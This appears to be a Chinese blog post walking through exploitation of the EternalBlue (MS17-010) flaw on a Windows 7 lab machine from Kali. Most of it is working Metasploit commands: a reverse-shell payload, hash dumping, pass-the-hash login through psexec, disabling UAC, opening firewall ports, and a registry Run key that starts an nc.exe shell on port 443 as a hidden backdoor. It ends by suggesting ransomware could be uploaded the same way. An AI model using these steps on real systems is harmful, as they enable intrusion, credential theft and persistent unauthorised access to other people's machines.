zoukankan      html  css  js  c++  java
  • 永恒之蓝漏洞复现及留下隐藏后门nc及关闭主机防护开启后门

    题记

            近期我打算把我脑子里面想了很久的需要实战的东西都完成一遍,所以频率会非常高,活到老,学到老。时间是检验真理的唯一标准。

    环境

            机器:kali(192.168.0.119)、win7(192.168.0.126)

            Ctrl+shift+t在kali打开2个窗口。

    一、探测目标是否存在此漏洞

    1、使用探测模块探测。

            use auxiliary/scanner/smb/smb_ms17_010

            set RHOSTS 192.168.0.126

            exploit

            可以看到目标主机存在此漏洞。

    二、漏洞利用

    1、使用攻击模块

    use exploit/windows/smb/ms17_010_eternalblue

    Show options

    2、瞄准目标

            set RHOSTS 192.168.0.126

            set payload windows/x64/meterpreter/reverse_tcp

            show options

    3、进行攻击并拿下

    set lhost 192.168.0.119

    exploit

    三、权限连接后留后门

    1、创建一个新用户来远程连接win7桌面。

            run post/windows/manage/enable_rdp

            run post/windows/manage/enable_rdp username=goddess password=123.com

    2、kali终端连接目标

            rdesktop 192.168.0.126

            然后就能用其他用户登录了。

    3、关闭主机防护开启后门

            Windows密码存放处:C:WindowsSystem32configSAM

            Linux密码存放处:vim /etc/shadow

    3.1Hashdump获取密码密文

            goddess:1003:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::

    3.2创建防火墙规则

            Shell

            netsh firewall add portopening TCP 4444 "goddess" enable all

            exit退出

            background把权限放到后台

    3.3使用hash值登录系统(遇到不会的就开show options看缺什么)

            use exploit/windows/smb/psexec

            set payload windows/meterpreter/reverse_tcp

            set rhosts 192.168.0.126

            set lhost 192.168.0.119

            set SMBUser goddess

            set SMBPass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

            set SMBDomain WORKGROUP

            exploit

    4、meterpreter > getuid

    5、下面我们配置一个后门程序,修改 UAC 的注册表,需要重启才能生效。

            Shell

            C:WindowsSystem32>cmd.exe /k %windir%System32 eg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f

            重启前留个后门。

            upload /usr/share/windows-binaries/nc.exe C:\windows\system32

            reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d 'C:windowssystem32 c.exe -Ldp 443 -e cmd.exe' 开机自启,监听端口为443

            shell

            防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行。

            C:Windowssystem32> netsh firewall add portopening TCP 443 "goddess" ENABLE ALL 重启

            shutdown -r -f -t 0

            重启后用户登录可以看到443开启了

            Kali使用nc监听:nc -v 192.168.0.126 443

            或者

    6、扩展

            可以像传nc一样上传勒索病毒。

  • 相关阅读:
    LeetCode 382. Linked List Random Node
    LeetCode 398. Random Pick Index
    LeetCode 1002. Find Common Characters
    LeetCode 498. Diagonal Traverse
    LeetCode 825. Friends Of Appropriate Ages
    LeetCode 824. Goat Latin
    LeetCode 896. Monotonic Array
    LeetCode 987. Vertical Order Traversal of a Binary Tree
    LeetCode 689. Maximum Sum of 3 Non-Overlapping Subarrays
    LeetCode 636. Exclusive Time of Functions
  • 原文地址:https://www.cnblogs.com/sunny11/p/14082618.html
Copyright © 2011-2022 走看看